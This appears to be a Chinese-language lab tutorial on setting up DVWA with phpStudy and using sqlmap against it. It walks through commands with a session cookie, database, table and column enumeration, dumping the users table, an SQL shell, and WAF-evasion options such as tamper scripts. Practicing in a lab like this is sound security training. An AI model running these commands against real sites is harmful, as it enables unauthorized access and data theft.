Sqlmap自动化注入工具

1、安装PHP集成环境
安装phpstudy
2、安装DVWA
C:\phpStudy\PHPTutorial\WWW目录下解压

$_DVWA[ ‘db_password’ ] = ‘root’;

admin:password

输入信息

3、设置代理开始抓包

4、开始探测
扫描语句
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#”
加cookies
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2”
扫描等级
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3
基于文件列表
sqlmap -m list.txt
不使用缓存
–flush-session
探测数据库名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 --dbs

探测数据库表名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa --tables

探测数据库列表名
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa -T users --columns

探测数据库数据
sqlmap “http://192.168.48.128:8023/DVWA-1.9/vulnerabilities/sqli/?id=112233*&Submit=Submit#” --cookie “security=low; PHPSESSID=mt7f5ll2o7qg6dq5egaa7htnq2” --level=3 -D dvwa -T users --dump

–technique B E U S T
Boolean-based blind #基于布尔
Error-based #基于错误
Union query-based #基于联合查询
Stacked queries(对文件系统、操作系统、注册表操作时，必须指定该方式) #堆叠查询
Time-based blind #基于时间
所有
-a
通过代理
–proxy=“http://1.1.1.1:8080”
动态
–random-agent
sql命令行
–sql-shell

exit #退出
5、提升等级



sqlmap -r 1.txt

6、绕过waf的一些参数：
-delay 每次http（s）请求之间延迟时间，浮点数，单位为秒，默认无延迟
-timeout 请求超时时间，浮点数，默认为30秒
-retries http（s）连接超时重试次数，默认3次
-randomize 长度、类型与原始值保持一致的前提下，指定每次请求随机取值的参数
http://192.168.1.1/?id=100 –randomize(id)
–tamper 发送数据混淆脚本（类似于编码） 脚本位置 /usr/share/sqlmap/tamper/